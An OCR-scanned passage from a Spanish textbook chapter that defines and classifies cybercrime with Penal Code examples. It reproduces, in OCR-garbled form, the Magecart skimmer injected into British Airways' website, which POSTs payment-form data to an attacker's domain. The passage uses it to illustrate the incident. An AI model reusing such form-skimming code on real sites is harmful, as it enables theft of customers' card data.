los gustos personales o la navegación de sus usuarios, sin que estos le hubieran
dado un "consentimiento inequívoco", la utilizaba para fines publicitarios. y no
la cancelaba o eliminaba cuando ya no eran necesarios para su fin legítimo o
cuando el usuario lo solicitaba 1.

Por lo general los ciudadanos no tienen una conciencia clara de los pe-
ligros de Internet y de las TIC, que tendrán su máxima expresión en el "Inter-
net de las cosas" (Internet ofThings - IoT). La interconexión digital de objetos
cotidianos con Internet ( el automóvil, la nevera u otros electrodomésticos, el
termostato de nuestro hogar, un marcapasos, un dispositivo de seguridad ...)
puede facilitarnos la vida, pero debemos ser conscientes también de que re-
copilan información sobre nosotros.
De esta manera entran en el radio de acción de las nuevas tecnologías, y
con ello en el de sus peligros, bienes jurídicos como la intimidad y la propia
imagen, pero también el patrimonio, la libertad e indemnidad sexual, la pro-

1 La resolución puede consultarse en https://www.aepd.es/ resoluciones/ PS-00082-


20l 7_REC.pdf Facebook y WhatsApp han sido sancionadas en otras ocasiones por la ANPD.

- 146 -
Capítulo 4. EL CIBERCRIMEN. DEFINICIÓN, CLASIFICACIÓNYMARCO LEGISLATIVO

piedad intelectual e industrial, el honor, la libertad, el estado civil, el orden


público ...
En estos ámbitos las nuevas tecnologías, como veremos con detenimien-
to en el Capítulo 6, han supuesto en algunas ocasiones nuevas formas de ata-
que antes desconocidas a viejos bienes jurídicos, y en otras han facilitado y
multiplicado los efectos de formas de ataque que ya nos eran también cono-
cidas.
Ej. 4.3: Así, por ejemplo, las tradicionales formas de ataque al patrimonio
ajeno se reconducen al hurto, cuando la cosa se toma sin el consentimiento de
su dueño, pero sin ejercer fuerza, violencia o intimidación, el robo, cuando en
cambio son aquellos precisamente los modos comisivos, o la estafa, si la técnica
empleada por el delincuente es el engaño. Pero cuando las transacciones econó-
micas ya no se realizan directamente entre personas, sino con máquinas, el con-
cepto de engaño ya no sirve para definir la conducta delictiva. ¿Cómo se engaña
a la máquina? Esta nueva modalidad de ataque al patrimonio exigió una tipifi-
cación especial. Así, el artículo 248 añadió un segundo supuesto según el cual
también se considera estafa el conseguir, con ánimo de lucro, una transferencia
no consentida de cualquier activo patrimonial en perjuicio de otro, valiéndose
de al9una manipulación informática o artificio semejante.

Ej. 4.4: El delito de injurias se define en el artículo 208 del Código penal
como aquella "acción o expresión que lesionan la dignidad de otra persona. me-
noscabando su fama o atentando contra su propia estimación", y el artículo 209
castiga como tipo agravado las "injurias graves hechas con publicidad". A lo que
el artículo 211 añade: "La calumnia y la injuria se reputarán hechas con publici-
dad cuando se propaguen por medio de la imprenta, la radiodifusión o por cual-
quier otro medio de eficacia semejante". Tradicionalmente una injuria se podía
realizar con publicidad si por ejemplo se insertaba en las p,íginas de un diario, o
se proclamaba por la radio. Pero resulta evidente que el acceso a dichos medios
que facilitan la difusión no era tan sencillo como el que proporcionan las nuevas
tecnologías. En la actualidad es fácil para cualquiera acceder a un gran número
ele personas mediante la publicación de un mensaje injurioso en su red social,
en un blog, o en una página web. La conducta es la misma de siempre, pero las
TIC han facilitado considerablemente su comisión y multiplicado exponencial-
mente sus efectos.

Las TIC como medio especialmente apto para trasmitir un mensaje con
una difusión planetaria se convierten también en un método idóneo para la
comisión de todos aquellos delitos que consisten precisamente en la expre-
sión o manifestación de determinados mensajes.

- 147 -
Cibercriminalidad.
gunda parte. ASPECTOS PENALES YCRIMINOLÓGICOS DE LA CRIMINALIDAD RELACIONADA CON LAS TIC.

Ej. 4.5: Como por ejemplo los delitos de odio, las actividades de difusión de
mensajes terroristas o de captación de adeptos, etc.

En la presente obra dedicaremos mayor atención a aquellos delitos en


los que las TIC han abierto la puerta a nuevas formas de ataque al bien jurí-
dico, lo que ha exigido, a su vez, nuevas tipificaciones penales. Respecto del
segundo grupo de delitos, en cambio, consideramos que el lector conoce ya
su regulación, por lo que incidiremos exclusivamente en los aspectos crimi-
nológicos o en problemas legales muy particulares que surgen a partir de su
comisión mediante las TIC.

l. Los sistemas de información y sus funciones como objeto de


protección

En los capítulos anteriores se han proporcionado unas nociones básicas


sobre la informática, sus funciones, su funcionamiento y las necesidades de
seguridad. También se ha explicado ya la evolución de las amenazas confor-
me avanzaba la propia tecnología. Por ello nos remitimos a aquellos capítulos
en este punto para ilustrar la relevancia que para amplios ámbitos industria-
les, económicos, sociales, personales e incluso políticos o de otra índole tiene
la protección de los propios sistemas informáticos y su correcto funciona-
miento.
Como se explicó en los capítulos anteriores, en una sociedad en la que
ya prácticamente todo está informatizado (desde nuestro propio hogar, pa-
sando por las empresas, hasta las infraestructuras estatales básicas, la admi-
nistración pública, el sistema sanitario, el sistema financiero ...) los datos y la
información que puede quedar comprometidos en un ataque informático son
muy variados. Pero lo relevante para reconocer un bien jurídico antepuesto
"ciberseguridad" es que la mera quiebra del sistema de seguridad informáti-
ca de una determinada organización tiene consecuencias inmediatas, con in-
dependencia del apoderamiento real de información que se haya conseguido,
o del peligro que para otros bienes jurídicos suponga esa quiebra de la segu-
ridad. La lesión de la ciberseguridad produce efectos directos en el funciona-
miento de la empresa u organización, que puede quedar suspendido hasta
que el fallo se subsane, con los consiguientes costes directos: el remplazo del
sistema de seguridad, e indirectos, debidos a la pérdida de actividad; pero
también tendrá consecuencias inmediatas en la reputación, la fiabilidad y la
credibilidad de dicha organización, lo que, según el ámbito en el que la misma
opere, tendrá enormes y variadas consecuencias, de nuevo económicas, pero
también sociales, políticas, etc.

- 148 -
Capítulo 4. EL CIBERCRIMEN. DEFINICIÓN, CL IFI A IÓNY MARC O LEGISLATIVO

Ej. 4.6: El 7 de septiembre de 2018 el holding lnternational Airlines Group


cayó un 3% en bolsa tras revelarse que una de sus compafiías, British Airways,
había sufrido un ataque informático mediante el que los delincuentes habían
accedido ilícitamente al sistema, quedando expuestos los datos de las tarjeas
bancarias de unos 500.000 clientes. Según la investigación realizada por la em-
presa de seguridad RiskIQ 2 , un grupo criminal penetró en el servidor de British
Airways, probablemente por un fallo de seguridad, y modificó el código del pro-
grama Modernizr Java Script que utilizaba la aerolinea en su web, inyectando
22 lineas de código para capturar las pulsaciones de ratón y averiguar asi el
momento de envío del formulario de datos del cliente, a partir de ahí capturar el
formulario cuando era enviado y obtener de esta manera los datos de las tarje-
tas de crédito, que remi tían a un servidor en Rumanía.

Figura: Representación de las 22 líneas de código insertadas.


1 wrnaow.onload '-" f imction {I {
2 jQuery( "#-subm1 t8otton" ). bind( "raouseup toucheod'' , fw1ctio1'1 (a) {
3 v;,r
4 n !ó {} :

5 jQuery ( "ilpaymentform" ) . seria lizeArray( ) . map( funct.ion (a) {


6 n{a. name] = a.vaiue
7 }) ;
a var e "' document. 9ctElement8yid ("personP¡¡y1ng'' J.innerHTML ;
9 n. person = e ;
10 var
11 t "' JSON . stringify(n ) ;
12 setíimeout ( function (l {
13 jQuery .ajax({
14 type : "POST''.
1'.> async !0,
16 url : "https: //baway~. com/qatewa 1•/app/dataproc.essir1g/11p1/",
1.7 data : t ,
18 dataType : "appl1car1an/json"
19 })
20 }, 500 )
21 })
22 };

Fuente: RiskIQ

Además del daño reputacional, las pérdidas de negocio que este inciden-
te provocó en la aerolínea, al estar suspendido el servicio de su web durante
horas y el coste económico de la necesaria revisión del todo el sistema de segu-
ridad, en julio de 2019, la agencia de protección de datos y transparencia bri-
tánica (Oficina del Comisionado de Información de Reino Unido, ICO, por sus
siglas en inglés) hizo pública su propuesta de sancionar a la empresa por este
hecho, que achacó a su falta de seguridad, con una multa de 183.390.000 libras
(204.600.000 de euros) .

2 https://www.riskiq.com/blog/labs/magecart-british-airways-breach/ (último acceso


15.07.19)

- 149 -
Cibercriminalidad.
Segunda parte. ASPECTOS PENALES YCRIMINOLÓGICOS DE LA CRIMINALIDAD RELACIONADA CON LAS TIC.

Por tanto, la ciberseguridad corno bien jurídico cumple la función, por


una parte, de adelantar las barreras de protección de otros bienes jurídicos
(en particular la protección de la información) y por otra, tiene una dimen-
sión positiva: garantizar las condiciones necesarias para el correcto funcio-
namiento de la sociedad en el ámbito de las TIC (RUEDAMARTIN, 2018).
En esta obra vamos a defender, y entendernos que así se desprende de
la regulación penal española y de la normativa internacional que la inspira, a
pesar de la errónea ubicación de estos delitos en nuestro Código penal, que
no solo la información relativa a la intimidad de las personas contenida en
sistemas de información o trasmitida a través de sistemas de comunicación,
ni tampoco solo el aspecto patrimonial de los sistemas y su contenido son
merecedores de protección penal. La propia seguridad de los dispositivos
informáticos conectados, de los sistemas de comunicaciones y de las pro-
pias comunicaciones es merecedora de dicha protección. En otras palabras
y corno ya se ha adelantado: La ciberseguridad es un bien jurídico digno de
protección penal.

2. Las nuevas tecnologías como nuevas formas de ataque a bienes


jurídicos tradicionales

Las nuevas tecnologías ya han invadido todos y cada uno de los aspectos
de la vida en sociedad y, evidentemente, la criminalidad no representa una ex-
cepción. La revolución industrial vivida por nuestros antepasados se asemeja a
la revolución tecnológica y cibernética que todavía estamos transitando y que
desconocernos cómo evolucionará en el futuro. Corno enunciaba descriptiva-
mente MoRóN LERMA (1999, 83-85): "Se ha consolidado la transición a una in-
formática de masas, que ha invadido a toda la sociedad, como en su tiempo lo
hiciera la electricidad, con la diferencia de que la telemática no trasmite una
corriente inerte, sino información, esto es, poder". El uso de inteligencia arti-
ficial, drones, robótica, dornótica, herramientas de ciberseguridad, sistemas
de reconocimiento facial, altavoces inteligentes, robots quirúrgicos, implantes
cerebrales, por citar solo unos cuantos ejemplos, no es un hecho transitorio
sino permanente y progresivo, en constante evolución, al igual que el concep-
to criminológico de delito, que siempre se ha mantenido alejado del concepto
jurídico formal manejado por el Derecho penal (es decir, este no se construye
en torno a una noción normativa sino relativa, pues se nutre de las distintas
instancias del sistema del que dependen la reacción o control social).
No podernos si quiera prever si la existencia de bienes jurídicos tradi-
cionales, los que conforman el llamado núcleo duro del Derecho penal (vida,

- 150 -
Capítulo 4. EL CIBERCRIMEN. DEFINICIÓN, CLASIFICACIÓN YMARCO LEGISLATIVO

integridad física, libertad, etc.) e incluso aquellos de segunda o tercera gene-


ración (medio ambiente, salud pública) podrán convivir con otro núcleo de
potenciales bienes jurídicos desconocidos para el Derecho penal moderno.
Ej. 4.7: Por la vía, po r ejemplo, de la robótica yla desviación incontrolada
de las máquinas "robots", que causen daños (ya sean potencialmente previsi-
bles, dependiendo del nivel de control humano, en cuyo caso el principio ele pre-
caución operaría como límite normativo para integrar un delito imprudente, o
imprevisibles por la plena autonomía del robot) (QUINTERO OLIVARES, 2017).

Hay que mencionar también la desconocida, pero alarmante y cercana


irrupción de potenciales víctimas por el uso de tecnología relacionada con la
inteligencia artificial (IA) (Mrnó LLINARES, 2019).
Ej. 4.8: Como la desarrollada por el equipo de investigadores que ha crea-
do Pluribus, una inteligencia artificial capaz de derrotar a los profesionales hu-
manos de élite en el juego de póker Texas Hold 'em, el formato de póker más ju-
gado en el mundo , y que es capaz de aprender a ganar de cero, desarrollando
sus propias estrategias ganadoras, al margen del saber acumulado por los seres
humanos, descubrimiento recientemente publicado (BROWN & SANDHOLM, 2019) .
La incógnita se abre a la hora de decidir apJicar estos juegos de información im-
perfecta a la toma de decisiones militares, por ejemplo, una vez reconocido que
el proyecto cuenta con el apoyo financiero de la Oficina de Investigaciones del
Ejército de Estados Unidos y parcialmente de Facebook.

El desconocimiento sobre si este tipo de tecnología se usa discriminada


o indiscriminadamente por parte de los Estados constituye, en cierto modo,
una alegoría del mundo representado por Orwell en su famosa novela políti-
ca 1984.
Desde otros ámbitos relacionados con la IA y la seguridad ciudadana,
podemos destacar la tecnología de reconocimiento facial -una herramienta
de vigilancia invasiva que amenaza nuestra libertad de manera omnipresente
(en calles, carreteras y autopistas, aeropuertos, centros comerciales, etc.)-.
Ej. 4.9: Según el primer análisis independiente del sistema, la tecnología
de reconocimiento facial utilizada por Scotland Yard en la metrópoli de Londres
es errónea en la gran mayoría de los casos y seguramente ilegal. Los fallos de-
tectados en el funcionamiento del sistema indican que a menudo identifica in-
correctamente a personas que posteriormente son detenidas equivocadamen-
te . También percibieron que su manejo coexiste con el rastreo de la vigilancia
(siffveillance creep ), por la utilización de la tecnología para encontrar personas
que no eran buscadas por los tribunales. Y advirtieron lo injustificable ele esta
tecnología desde la perspectiva del respeto a los derechos humanos, cuya nor-

- 151 -
Cibercriminalidad.
ndo parte. ASPECTOS PENALES y CRIMINOLÓGICOS DE LA CRIMINALIDAD RELACIONADA CON LAS TIC.

mativa protege bienes jurídicos tan esenciales como la privacidad, la libertad de


expresión y el derecho de manifestación. (FussEY & MuRRAY, 2019 ).

De igual manera, el uso extendido de criptomonedas como el Bitcoin


(uno de los medios más idóneos de cambio en la denominada deep web o dark
Internet que posibilita que las transacciones se efectúen de usuario a usuario
directamente, sin intermediarios ni intervención de las instituciones banca-
rias y donde el anonimato es la pieza angular), simboliza uno de los tremen-
dos retos que afectan no solo al ámbito regulatorio sino también, y como no
puede ser de otra manera, a la respuesta que el ordenamiento penal ofrezca a
enormes dificultades éticas y conceptuales.
Las nuevas tecnologías proporcionan una multiplicidad de medios co-
misivos para cometer delitos de nuevo cuño, desconocidos en Derecho penal,
y por esta razón, tanto los Estados como la comunidad internacional se han
visto obligados, como veremos en los siguientes capítulos, a ofrecer respues-
tas punitivas ante los nuevos desafíos que comportan dichas infracciones. La
irrupción de las TIC faculta continuar cometiendo delitos tradicionales de
manera no tradicional, desde cualquier lugar y en cualquier momento.
Como vemos, la nueva generación de (ciber)delitos ya no solo depen-
de del hecho de realizarse mediante ordenadores, pues el ciberespacio como
ámbito comunicativo es un lugar universal y transnacional y, por tanto, de
forma simultánea y en ubicaciones alejadas entre sí (incluso desde el deno-
minado espacio exterior o vacío, fuera de la atmósfera), se pueden cometer
ilícitos penales contra bienes jurídicos tradicionales. Es más, la incertidum-
bre acerca de lo que nos depara la tecnología 5G y sus posibilidades, presumi-
blemente dejará desfasada, en un futuro no muy lejano, la lista de ciberdelitos
contemplados en la actualidad.
A continuación, esbozaremos algunas características del inédito modus
operandi relacionado con determinadas conductas en el ciberespacio. Entre
ellas, la doctrina ha destacado la facilidad de comisión del delito que pro-
porciona el medio tecnológico, especialmente el actuar a distancia, sin inme-
diación física y bajo un alto nivel de anonimato, lo que añade dificultades de
prueba. A menudo, además, las personas se atreven a hacer a través de Inter-
net lo que nunca harían de manera personal y, en ocasiones, llegan a confun-
dir uno y otro plano.
Ej. 4.10: Por ejemplo, en el caso del delito de trata de seres humanos (art.
177 bis ), uno de los elementos típicos del delito, la captación, ya no requiere un
procedimiento face to face o a través de intermediarios físicos, sino que Inter-
net y las RRSS han sustituido esa necesidad del contacto. Las víctimas de trata

- 152 -
Capítulo 4. EL CIBERCRJMEN. DEFINICIÓN, CLASIFICACIÓN YMARCO LEGISLATNO

captadas en el ciberespacio han aumentado considerablemente, según el último


informe publicado por la Oficina de las Naciones Unidas contra la Droga y el
Delito (UNODC por sus siglas en inglés) (GLDDAI. REroRT oN TRAFFICK!NG 1N PERSONS,
2018:39).

Ej. 4.11: El fraude online también se presta a todo tipo de nuevos procedi-
mientos, como el consistente en crear páginas web similares a otras de recono-
cida solvencia y legalidad, pero con una variación muy pequeña en el nombre del
dominio, que pasa casi desapercibida. La mayoría de estas webs suelen ofertar
todo tipo de productos, aunque los más habituales, paradójicamente, son produc-
tos electrónicos, pero también se aprovechan de la estación del año o de la cele-
bración de eventos a gran escala (reventa de entradas de partidos de fútbol o con-
ciertos. o la venta fraudulenta de aparatos de aire acondicionado). En ocasiones,
aprovechando que ya han logrado los datos personales de los estafados, la estafa
se repite, para lo cual simulan ser empleados de la entidad bancaria desde la que
se efectuó el pago del falso producto {que el estafado nunca recibe), contactan con
la víctima con el falso objetivo de alertarles sobre la existencia de un pago sos-
pechoso de ser fraudulento por la rnmpra de un producto, cantidad que pueden
recuperar si proporcionan su clave ele acceso a la entidad bancaria.

Ej. 4.12: Existen otros casos documentados en los que el ataque al bien
jurídico tradicional {p. ej., la vida en el delito de homicidio) traspasa el mundo
físico y se traslada al virtual, en forma de eutanasia cibernética o muerte digital.
O viceversa, los conflictos del mundo virtual se trasladan al espacio físico y se
cometen delitos contra la vida real. La aparición de juegos virtuales en los que
el usuario desarrolla una vida paralela con la creación de un alter ego o "ava-
tar", como Second Life o MapleStory sirven de vehículo para desatar conductas
pedófilas, homicidas y psicópatas. Este universo virtual permite no solo crear
una versión de uno mismo, sino que se pueden comprar terrenos, construir
edificios, instalar negocios, etc., y muchas de las actividades son gratuitas, pero
otras no, por lo que Second Lije cuenta con una moneda propia, los dólares Lin-
den . En 2008 una profesora japonesa de piano creó su avatar en el videojuego
MapleStory y contrajo matrimonio con el avatar de otra persona, tras lo cual
llegó el divorció y entonces e11a decidió "asesinar virtualmente" a su exmariclo
en el juego: hackeó y accedió a su cuenta de usuario, borró su historial, partidas
guardadas, contactos y, por último, eliminó la propia cuenta. El propietario ele!
avatar eliminado, el exmarido virtual, denunció los hechos y la mujer fue con-
denada por un delito de hacking 3 . Otros usuarios han originado resultados más
graves, como secuestros y asesinatos reales, al no distinguir la línea divisoria
entre vicia real y virtual.

3 https://www.theguardian.com/world/ 2008/ oet/24/japan-games (último acceso 15.07.19)

- 153 -
Cibercriminalidad.
Segunda parte. ASPECTOS PENALES YCRIMINOLÓGICOS DE LA CRIMINALIDAD RELACIONADA CON LAS TIC.

II. TERMINOLOGÍA

l. Delitos informáticos v. cibercrimen

Desde los años 70 se venía utilizando en el ámbito anglosajón el térmi-


no computer crime para hacer referencia al fenómeno de la delincuencia co-
metida a través de la informática, aunque también se usaban otros términos,
como crime by computer. En español solía utilizarse la expresión delito infor-
mático, o en alemán, por ejemplo, Computerdelikte, o se usaban expresiones
como criminalidad informática o Computerkriminalitéit.
Los primeros estudios sobre delitos informáticos focalizaban su aten-
ción en la delincuencia informática patrimonial, de manera que la tecnología
informática se veía, principalmente, como un medio para obtener un benefi-
cio ilícito causando un daño patrimonial a un tercero, pero pronto se extendió
el interés a los ataques a la intimidad, y a los propios sistemas informáticos
junto a la información contenida en ellos.
Aunque no existe una definición oficial de lo que debe considerarse un
delito informático, ni tampoco acuerdo doctrinal al respecto, la doctrina ma-
yoritaria suele englobar en esta categoría aquellos delitos que guardan re-
lación con la informática, ya sea porque aquella es el medio utilizado para
cometer el delito, o porque constituye el objeto sobre el que recae la acción
delictiva (BEQUAI, 1978). Partiendo de esta definición amplia suele ponerse el
acento en que no se trata de una categoría delictiva en sentido estricto, ya
que los diferentes comportamientos delictivos que en ella se incluyen no se
refieren al ataque a un único y mismo bien jurídico, ni presentan problemas
dogmáticos comunes. Se trata más bien de una definición fenomenológica
surgida ante la comprobación de un nuevo ámbito de riesgo: la actividad in-
formática y su notable expansión, que comprometía cada vez a más bienes
jurídicos. Así, la delincuencia informática agrupa una serie de conductas de-
lictivas que presentan una serie de problemas comunes relacionados con los
nuevos intereses, las nuevas formas de comunicación y los nuevos peligros
que supone la actividad informática. Estas características comunes adverti-
das desde el surgimiento de la categoría eran la vulnerabilidad de los orde-
nadores y de la información contenida en ellos, las dificultades técnicas de
protección, la facilidad de comisión del delito que proporciona el medio tec-
nológico, en particular el hecho de actuar a distancia, sin inmediación física,
lo que añadía dificultades de prueba.
Aunque el término delito informático sigue utilizándose hoy en día,
desde los años 90, sin embargo, se va extendiendo un neologismo que con el

- 154 -
Capítulo 4. EL CIBERCRJMEN. DEFINICIÓN, CLASIFICACIÓN YMARCO LEGISLATIVO

tiempo se ha consolidado: cibercrime en inglés y cibercrimen o cibercrimina-


lidad en español. El vocablo se compone del prefijo cyber, derivado del térmi-
no cyberspace (ciberespacio) y la palabra crimen.
Cyberspace fue un término inventado por el escritor de ciencia ficción William
Gibson, para describir el medio virtual en el que tiene lugar la actividad informática
en red, y se popularizó a partir de su novela Neuromancer (Neuromante). De ahí el
prefijo saltó a través de la prensa anglosajona para describir, más emocional que
científicamente, los riesgos de comportamientos dañinos que acechan en la red, por
lo que algún autor ha comentado que hubiera sido más correcto hablar de cyberspa-
ce crime (WALL, 2003, 2007).

Con el tiempo el término ciberdelito -o cibercrimen- ha hecho fortuna


tanto en el debate público como en el académico, hasta el punto de dar nom-
bre al Convenio de Budapest de 2011 (Convention on Cybercrime) el primer
tratado internacional sobre delitos cometidos a través de Internet y otras re-
des informáticas.
Utilizaremos los términos ciberdelito y cibercrimen como sinónimos. En reali-
dad, el Derecho penal español no contiene una categoría a la que denomine crimen.
Las infracciones penales se clasifican según nuestro Código penal en delitos graves,
delitos menos graves y delitos leves. El término crimen suele ser entendido en el
lenguaje popular como delito grave, pero aquí no es usado tampoco en ese sentido.
Al contrario, utilizaremos la palabra cibercrimen con independencia de que nos re-
firamos a una conducta grave, menos grave o leve, simplemente porque proviene de
la traducción más directa del término anglosajón crimen, lo que ha dado lugar a su
utilización en la literatura. A pesar de ello cibercrimen también se traduce, especial-
mente en los textos oficiales, como ciberdelincuencia. Precisamente para destacar
que, como veremos a continuación, el término no hace referencia a una categoría
normativa sino más bien criminológica.

Por lo general el término cibercrimen se considera más adecuado que


la antigua nomenclatura de delitos informáticos por responder mejor a la
evolución de la delincuencia en el ámbito que nos ocupa, caracterizada en la
actualidad por haber trasladado el centro del riesgo a las redes. Es decir, si
el inicial concepto criminológico de delincuencia informática ponía el acento
en el uso de ordenadores para la comisión del delito, el actual de cibercrimen
lo pone en el aspecto comunicativo de las TIC, en el uso de las redes, con es-
pecial protagonismo de Internet (CLOUGH, 2015, WALL, 2007, RoMEo CASABONA,
2013, Mrnó, 2013).
En esta obra manejaremos los términos ciberdelito, ciberdelincuencia,
cibercrimen o cibercriminalidad como términos comprensivos de la tipología
de conductas que aquí nos interesan: aquellas conductas delictivas que se ca-
racterizan por el uso de las TIC, incluyendo Internet, como medio de comisión
y en ocasiones también como objeto de ataque. Consideramos, con la mayoría

- 155 -
Cibercriminalidad.
Segunda parte. ASPECTOS PENALES YCRIMINOLÓGICOS DE LA CRIMINALIDAD RELACIONADA CON LAS TIC,

de la doctrina, que el término cibercrimen engloba todos los delitos informá~


ticos, pero, al tener en cuenta no solo el aspecto relativo a la información sino
sobre todo el papel comunicativo de las TIC comprende, además, aquellas in-
fracciones consistentes en un incorrecto uso de las comunicaciones a través
de las redes telemáticas o en la introducción en ellas de contenidos ilícitos y
en la incorrecta utilización de estos (MrRó, 2013).
Ej. 4.13: El artículo 183 te1; castiga al que, a través de Internet, del teléfono
o de cualquier otra tecnología de la información y la comunicación contacte con
un menor de dieciséis años y proponga concertar un encuentro con el mismo a fin
de cometer cualquiera de los delitos descritos en los artículos 183 y 189, siempre
que tal propuesta se acompañe de actos materiales encaminados al acercamien-
to. Esta conducta delictiva, conocida como grooming, tiene más que ver con el as-
pecto comunicativo de las TIC que con el tratamiento de la información.

La nueva categoría, además de permitir englobar otras conductas más


relacionadas con la comunicación que con la información, permite también
hacer referencia a nuevos factores que caracterizan a esta delincuencia y que
dificultarán la persecución penal, como son la rapidez de acceso, el bajo cos-
te, y, sobre todo, el relativo anonimato que garantiza Internet, lo que obstacu-
lizará el descubrimiento del responsable y la prueba, así como la ejecución a
distancia, que puede llegar a ser transnacional, al actuar en numerosas oca-
siones los delincuentes desde fuera del territorio donde se produce el resul-
tado delictivo final.

2. Cibercrimen en sentido estricto v. en sentido amplio

Como ya se ha adelantado, no existe una definición oficial de cibercri-


men, ni un acuerdo doctrinal sobre lo que se deba entender por tal.
Una concepción estricta de ciberdelito pondrá el acento en las TIC, no
solo como medio, sino, sobre todo, como objeto de protección. Así, siguiendo
la declaración de intenciones del Convenio de Budapest, podemos definir los
ciberdelitos propios, o en sentido estricto, como aquellos en los que por me-
dio de las TIC se atenta contra la confidencialidad, la integridad y la disponi-
bilidad de los sistemas informáticos y las redes.
Ej. 4.14: El artículo 264 bis del Código penal castiga al que "sin estar au-
torizado y de manera grave, obstaculizara o interrumpiera el funcionamiento
de un sistema informático ajeno: introduciendo o transmitiendo datos ... ". Este
precepto tipifica como delito la práctica conocida como ataque DoS, denegación
de servicio, que consiste en hacer que un servicio o recurso sea inaccesible,

- 156 -
Capítulo 4. EL CIBERCRIMEN. DEFINICIÓN, CLASIFICACIÓN YMA RCO LE GISLATIVO

provocando la pérdida de la conectividad con la red por el consumo del ancho


de banda mediante la sobrecarga de los recursos computacionales del sistema
atacado. Por ejemplo, bloqueando un servidor web con míllones de intentos de
conexión simultáneos perpetrados a través de una botnet (una red de ordena-
dores zombies controlados por el atacante sin que sus usuarios legítimos lo se-
pan). Otra variante es el mail bomber (envío de enormes cantidades de correos
electrónicos a una dirección de email con el objetivo de saturar el servidor de
correo). Nos encontramos ante un cibercrimen en sentido estricto.

En cambio, ciberdelitos impropios o en sentido amplio serán aquellos en


s que el uso de las TIC es solo el medio comisivo para atentar contra otros
ienes jurídicos individuales, colectivos o supraindividuales. Este medio co-
misivo, sin embargo, deberá haber cobrado tal protagonismo en la ejecución
del delito que se convierta en un elemento esencial del mismo, de manera que
presente las características que nos llevan a integrar el hecho en la catego-
ría de cibercrirnen. Así, muchos autores, aun no restringiendo el concepto de
cibercrirnen a uno absolutamente estricto o propio, consideran que tampo-
co basta para otorgar tal calificación con que las TIC sean el medio comisivo,
sino que tienen que ser precisamente la utilización de las funciones propias
del ordenador: procesamiento y transmisión automatizados de datos y la
confección y/ o utilización de programas para tales fines, lo que identifique la
conducta delictiva.
Ej. 4.15: El artículo 183 ter castiga, como hemos visto arriba, en el Ej. 3.13,
la práctica conocida como grooming . Por lo general un adulto, escondido tras un
falso perfil de menor en una red social, entabla amistad con un o una menor de 16
años y se gana su confianza para conseguir un encuentro con él, ele manera que
cuando el muchacho o muchacha acucia confiado a la cita con su supuesto amigo
de Internet se encontrará en realidad con un pederasta que le espera con la inten-
ción de realizar actos de naturaleza sexual sobre él. Estamos ante un ciberdelito
impropio o en sentido amplio.

En todo caso, la mayoría de la doctrina propugna una definición de la


cibercrirninalidad que englobe tanto los ciberdelitos en sentido estricto corno
los ciberdelitos en sentido amplio (ya se otorgue mayor o menor amplitud a
estos últimos).
Y esta es también la orientación del Convenio de Budapest, que, a pesar
de no contener una definición, pretende prevenir "los actos dirigidos contra
la confidencialidad, la integridad y la disponibilidad de los sistemas informá-
ticos, redes y datos informáticos, así corno el abuso de dichos sistemas, redes
y datos". Cuando en la segunda parte de la frase el Convenio se refiere al abu-
so de las tecnologías entendernos que se está refiriendo a los ciberdelitos irn-

- 157 -
Cibercriminalidad.
Segunda parte. ASPECTOS PENALES YCRIMINOLÓGICOS DE LA CRIMINALIDAD RELACIONADA CON LAS'111

propios, aquellos en los que las TIC, lo particular de las mismas, es utiliz llo
como medio delictivo.

3. Qué no es un cibercrimen

En este apartado intentaremos distinguir los cibercrímenes de otr


conductas afines que no deben incluirse en tal denominación.

3.1. Conductas ilícitas que no son cibercrímenes


Por un lado, debemos referirnos a aquellas conductas cometidas a través'
de las TIC que son molestas o incluso dañinas y que tienen la consideración
de ilícitas (prohibidas por la ley), pero que no constituyen delito. Es decir, a
pesar de estar prohibidas, no lo están por una ley penal y bajo la amenaza
de una pena. Y ello porque el legislador ha considerado que su gravedad no
merece tal respuesta y que para combatirlas basta con la reacción de otros
sectores del ordenamiento, por lo general con sanciones administrativas.
Un ejemplo claro de este tipo de conductas es el llamado spam, o correo
basura. Se conoce como spam al envío de comunicaciones no deseado, ge-
neralmente con fines publicitarios, de manera masiva e indiscriminada, por
medio del correo electrónico u otros medios de comunicación electrónica
equivalentes. Esta práctica se inició en 1978 y se ha extendido notablemente
desde entonces.
El término SPAM es una contracción de los vocablos "Spiced Ham", y hace re-
ferencia a la carne enlatada de baja calidad que comían los soldados en el frente la
Segunda Guerra Mundial. El grupo cómico británico Monty Python popularizó un
sketch sobre esta comida y su inserción abusiva en cualquier menú barato y labro-
ma sirvió más tarde para que el término spam se aplicara a los correos enviados de
forma masiva (TEMPLETON).

El spam publicitario no es delito en España en la actualidad, aunque sí es


ilícito, está prohibido por el art. 21 de la Ley 34/2002 de 11 de julio, de servi-
cios de la sociedad de la información y de comercio electrónico:
Artículo 21. Prohibición de comunicaciones comerciales realizadas a través de
correo electrónico o medios de comunicación electrónica equivalentes.
l. Queda prohibido el envío de comunicaciones publicitarias o promociona-
les por correo electrónico u otro medio de comunicación electrónica equi-
valente que previamente no hubieran sido solicitadas o expresamente au-
torizadas por los destinatarios de las mismas.
2. Lo dispuesto en el apartado anterior no será de aplicación cuando exista
una relación contractual previa, siempre que el prestador hubiera obte-

- 158 -
apltulo 4. EL CIBERCRIMEN. DEFINICIÓN, CLASIFICA IÓN YMARCO LEGISLATIVO

nido de forma lícita los datos de contacto del destinatario y los emplea-
ra para el envío de comunicaciones comerciales referentes a productos o
servicios de su propia empresa que sean similares a los que inicialmente
fueron objeto de contratación con el cliente.
En todo caso, el prestador deberá ofrecer al destinatario la posibilidad de opo-
rse al tratamiento de sus datos con fines promocionales mediante un procedi-
mlento sencillo y gratuito, tanto en el momento de recogida de los datos como en
nda una de las comunicaciones comerciales que le dirija.
Cuando las comunicaciones hubieran sido remitidas por correo electrónico,
dicho medio deberá consistir necesariamente en la inclusión de una dirección de
correo electrónico u otra dirección electrónica válida donde pueda ejercitarse este
derecho, quedando prohibido el envío de comunicaciones que no incluyan dicha di-
rección.

La realización de esta conducta constituye una infracción grave, que se


nciona con una multa de 30.001 a 150.000 euros.
En realidad, aunque a nivel particular nos parezca una molestia menor,
s macrocifras de pérdidas de rendimiento y de tareas de limpieza que ge-
n ra el spam a las empresas son inmensas. El spam supone una pérdida de
lempo y de energías para el receptor, unos costes adicionales para los equi-
pos que intervienen en las comunicaciones, que deben gestionar un ancho de
banda y un volumen de información, y para los proveedores del servicio de
arreo que tienen que aumentar el tiempo de proceso, la capacidad de alma-
cenamiento y desarrollar técnicas de filtrado, lo que a su vez puede generar
problemas adicionales con sus clientes (posibilidad de eliminar correos que
